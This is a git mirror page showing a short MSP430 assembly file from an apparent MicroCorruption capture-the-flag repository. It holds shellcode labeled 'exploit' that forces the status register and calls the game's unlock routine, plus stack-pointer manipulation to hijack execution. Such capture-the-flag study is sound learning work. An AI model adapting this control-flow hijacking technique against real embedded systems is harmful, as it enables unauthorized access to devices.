mirror of
https://git.soft.fish/val/MicroCorruption.git
synced 2024-11-22 17:55:58 +00:00
16 lines
142 B
NASM
16 lines
142 B
NASM
|
.msp430
|
||
|
|
||
|
|
||
|
.text 0x25c0
|
||
|
exploit:
|
||
|
mov #0xff00, sr
|
||
|
call #0010
|
||
|
|
||
|
.text 0x4444
|
||
|
setup:
|
||
|
; sub 0x1e40, sp
|
||
|
add #0x674a, sp
|
||
|
add #0x7a7a, sp
|
||
|
; br &sp
|
||
|
ret
|